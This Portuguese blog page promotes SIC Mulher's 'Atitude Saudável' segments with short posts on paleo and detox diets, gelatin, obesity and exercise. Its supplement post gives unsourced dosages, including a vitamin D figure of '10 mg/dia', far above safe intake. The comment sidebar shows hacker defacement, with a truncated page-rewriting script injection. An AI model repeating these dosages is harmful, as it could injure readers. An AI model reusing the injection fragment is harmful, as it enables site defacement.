Atitude Saudável @ 18:32

Seg, 06/05/13

O Paleolítico refere-se ao período anterior à invenção da agricultura. Segundo os proponentes desta abordagem alimentar, esta é a dieta à qual a nossa espécie está geneticamente adaptada.


No entanto, a dieta paleolítica necessita de ser adaptada aos tempos modernos. Afinal, é pouco provável que maioria de nós pretenda consumir insetos e larvas ou caçar os animais selvagens com as próprias mãos.


E no Mais Mulher desta terça-feira, na rubrica Atitude Saudável, iremos perceber quais os alimentos que compõem a dieta do paleolítico. Não perca… Às 17:30 na SIC Mulher!
E se não viu. Veja o vídeo aqui!

 


Tags:


Atitude Saudável @ 18:33

Seg, 22/04/13

A Faculdade de Motricidade Humana em parceria com o Instituto Teresa Branco, organizam um ciclo de conferências que teve o seu início na quarta-feira, dia 3 de Abril.


A iniciativa conta com a presença de diversos profissionais especialistas em obesidade e controlo do peso e tem por objectivo principal a discussão de temas relacionados com a gestão de peso.


“Vamos clarificar ideias erradas sobre a obesidade e discutir, em espaço aberto, as causas e potenciais soluções para este problema” explica o Professor Pedro Teixeira, catedrático da FMH, um dos organizadores e oradores deste ciclo de conferências.


Será um espaço de debate e a abordagem será positiva e não catastrófica, apontado para soluções práticas, médicas e psicológicas para que os resultados sejam saudáveis e duradouros.

 

No Mais Mulher desta terça-feira, às 17:30 na SIC Mulher!


Tags:


Atitude Saudável @ 18:33

Seg, 08/04/13

Sabe-se que quem tem menores rendimentos não só gasta maior proporção do seu orçamento em alimentação, como também tem uma estrutura de compras com menos produtos frescos e mais produtos ricos em açúcar e gordura de menos boa qualidade.

 

Uma vez que as despesas com a alimentação constituem a fatia mais flexível do orçamento familiar, em alturas de crise a qualidade da alimentação torna-se mais preocupante e o conhecimento revela-se como uma excelente ferramenta para uma melhor escolha.

 

Por isso é de extrema importância ouvir os concelhos dos melhores especialistas da área! E nesta terça-feira, às 17:30 na SIC Mulher, temos a especialista indicada para este assunto, Teresa Branco! Não perca...

 

E se não viu. Veja o vídeo aqui!

 


Tags:


Atitude Saudável @ 18:31

Seg, 25/03/13

O ganho de peso pode estar associado a uma baixa auto-estima mas o contrário tambem se aplica, assim, uma mulher que tenha tido sempre uma baixa auto-estima, esta muito mais predisposta a ganhar peso, uma vez que a forma negativa como se vê pode leva-lá a comer de forma compulsiva e nao ter motivação para fazer actividade física.

Por outro lado, o ganho de peso motivado por alguma alteração fisiologia, também poderá conduzir a uma baixa-auto estima, que por sua vez levara a um aumento do peso ainda maior.

A Anabela Castro é um exemplo de como a perda do peso pode contribuir para uma melhoria significativa da auto-estima, tendo-se tornado muito mais feliz no seu casamento, na sua vida social e ate profissional.

No Mais Mulher desta terça-feira, Anabela Castro partilhará o seu caso de sucesso na perda do peso e melhoria da auto-estima, fruto da realização de um programa de gestão do peso com uma forte componente na área da psicologia clínica.

Nao perca...
Às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


Atitude Saudável @ 18:30

Seg, 11/03/13

A gelatina é extraída do colágeno, especialmente do bovino e contém uma série de fragmentos de proteínas que fornecem aminoácidos, fundamentais para a manutenção dos ossos e a regeneração de algumas articulações. Contém 9 aminoácidos essenciais ao organismo.
Pode ser adquirida em folhas, em pó com sabor, ao natural ou em cápsulas. Porém, existe uma diferença entre a gelatina que compramos no supermercado (sobremesa) e a gelatina vendida em casas de suplementos alimentares.


As casas de suplementos vendem o colágeno em pó, ou em cápsulas, que é o colágeno na sua forma pura. Já a gelatina-sobremesa, que compramos no supermercado, também contém colágeno na sua composição, porém, em menor quantidade.


A gelatina do supermercado pode ser usada como um reforço do tratamento, porém, para se conseguir unhas e cabelos fortes, pele mais firme e articulações saudáveis, é necessário o consumo de colágeno, por isso e caso seja possível, compre gelatina natural para confeccionar as suas sobremesas.


As sobremesas compostas por gelatina, além de saciantes, contêm poucas calorias, o que significa que têm pouco açúcar e pouca gordura.

 

Esta terça-feira, no Mais Mulher, iremos falar-lhe dos benefícios da gelatina, tal como iremos apresentar-lhe algumas sobremesas saudáveis e pouco calóricas, à base de gelatina!

 

Por isso já sabe, não perca esta deliciosa rubrica com Teresa Branco e uma atitude muito saudável! Terça-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


Atitude Saudável @ 18:32

Seg, 18/02/13

O peso corporal ou mesmo o índice de massa corporal são parâmetros muito redutores no que se refere à avaliação da composição corporal.

Quando praticamos actividade física, podemos aumentar de peso e até de volume e não aumentar necessariamente de massa gorda. Por essa razão, quando se pratica actividade física regularmente, devemos criar objectivos diferentes e não nos centrarmos demasiado na perda do peso pois poderá ser muito desmotivante.

O exercício leva ao aumento da massa muscular, que sendo mais densa do que a gordura, leva a um aumento do peso, mas não a um aumento da massa gorda.

Assim, os objectivos devem ser centrados na avaliação do volume, da tonicidade muscular e na morfologia do nosso corpo. Por outro lado, é fundamental avaliar o bem-estar, a auto-estima, a gestão do stresse, a gestão da ansiedade e a gestão do sono. Todos estes parâmetros melhoram significativamente com a prática de actividade física e com um estilo de vida saudável e por isso, também devem ser definidos como objectivos e valorizados durante o processo.

 

Por isso, não perca o Mais Mulher desta terça-feira, e fica atenta aos concelhos de teresa Branco que de certo vão ajudar a ter uma vida melhor!

 

Às 17:30, na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 


Tags:


Atitude Saudável @ 18:33

Seg, 04/02/13

A melhor forma de avaliar a aptidão física é através do consumo máximo de oxigénio. Este parâmetro mede a capacidade que cada um de nós tem de consumir oxigénio por minuto. Quanto mais oxigénio conseguirmos consumir por minuto melhor é a condição física que temos. A melhoria deste indicador de aptidão física está muito associado ao ganho de saúde a vários níveis.


Vários estudos demonstraram que o aumento do consumo máximo de oxigénio, por minuto, está associado à prevenção da diabetes e da doença cardiovascular.

 

Esta terça-feira, no Mais Mulher José Teixeira irá testemunhar como melhorou o seu consumo máximo de oxigénio, perdendo 65kg através da reeducação alimentar e da pratica de exercício físico.

 

E se não sabia que a sua condição física é medida pelo seu consumo máximo de oxigénio?! E que é possível melhorar este índice, com uma alimentação adequada e exercício físico?! Não perca estas dicas para viver com uma Atitude Saudável...

 

No Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:


Atitude Saudável @ 18:31

Seg, 21/01/13

A dieta e o exercício são essenciais para a saúde em geral e para a perda do peso em particular. São fundamentais para criar um equilíbrio hormonal, tomando ou não suplementos hormonais. Os suplementos alimentares, não fazendo milagres, poderão ser um bom complemento na perda do peso e na saúde em geral. Os suplementos mais adequados são:

Vitaminas
Vitamina c – 1g 3x dia – baixam os lípidos sanguíneos
Niacin 10 mg dia - baixam os lípidos sanguíneos
CoQ10 100 mg dia -
Vitamina D 10 mg/dia – alguns estudos demonstram uma diminuição do peso em pessoas que tomam vitamina D

Minerais
Zinco 10 mg dia – muitas pessoas com excesso de peso apresentam uma deficiência em zinco, sendo recomendada a sua suplementação
Cromio 0.2-2 mg dia – parece diminuir os níveis de insulina no sangue em quem tem híper-insulinemia, diminui o mau colesterol e aumenta o bom colesterol  - parece reduzir a compulsão por açucar

Amino-acidos
l-glutamina: 500-2000 mg dia – parece promover uma melhoria na compulsão por hidratos de carbono
5-htp 100 mg dia – parece promover uma melhoria na compulsão por açúcar
Ácidos gordos  - 2-8 g dia - existem estudos que demonstram uma diminuição do apetite

 

Para saber mais, não perca o Mais Mulher desta terça-feira, onde Teresa Branco nos vai demonstrar como se faz!

 

Não perca, no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:


Atitude Saudável @ 18:32

Seg, 07/01/13

Depois de conquistar celebridades como Jennifer Aniston e Beyonce, a dieta detox tornou-se moda nos Estados Unidos.


E caso você seja um consumidor habitual de fritos, de alimentos com gordura trans ou muito processados, se fuma, se passa muito tempo ao sol e à poluição o seu organismo estará com certeza mais intoxicado e poderá não ter capacidade para se purificar sozinho, levando ao aparecimento de doenças.


As fibras são um elemento essencial na limpeza do organismo. Por isso, o cardápio detox é farto em hortaliças, frutas e sementes. Ficam de fora: carne vermelha, açúcar, leite de vaca e derivados e aditivos químicos. Durante o programa, procure ainda evitar pães e biscoitos refinados. Aliás, esses produtos podem sair de vez da sua alimentação. E qui deixo-lhe uma dica detox para o seu pequeno-almoço, a melhor forma de nutrir o seu organismo é consumir batidos apela manhã, em jejum...

 

Não perca as melhores dicas para manter uma atitude saudável para com a vida.

 

No Mais Mulher, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:


Atitude Saudável @ 18:32

Seg, 17/12/12

A melhor forma de fazer actividade física é através de modalidades que nos dão muito prazer. Saltar à corda para uns, poderá ser a maneira mais gratificante de estar em forma e de gastar calorias. Para outros, o surf poderá ser a maior fonte de prazer, assim como a dança do varão poderá ser a actividade mais motivadora. O exercício mais adequado é aquele para a qual estamos mais motivados.

 

Não vale a pena insistir em atividades para as quais não estamos motivados e que apenas as fazemos por obrigação e para queimar calorias. Mais tarde ou mais cedo acabamos por desistir.


As atividades das quais tiramos muito prazer geram uma motivação autónoma, ou seja, estamos motivados porque adoramos e se adoramos não deixamos de as fazer. As atividades que fazemos, não porque estamos motivados autonomamente, mas porque queremos agradar outros acabam por ser momentâneas nas nossas vidas.

 

Esta terça-feira, no Mais Mulher iremos mostrar-lhe varias atividades físicas que poderá adoptar e que poderão ser geradoras de prazer.

 

Não perca, na SIC Mulher às 17:30!

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO